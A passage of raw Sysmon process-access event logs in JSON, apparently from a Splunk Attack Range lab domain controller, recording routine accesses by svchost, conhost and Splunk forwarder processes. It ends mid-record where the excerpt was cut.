{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7992,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7993,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010DA5D0F00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010DA5D0F00}","TargetProcessId":"4168","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.162\r\nSourceProcessGUID: {41C8662E-2294-5F25-0000-00100FB90F00}\r\nSourceProcessId: 4168\r\nSourceThreadId: 2928\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program 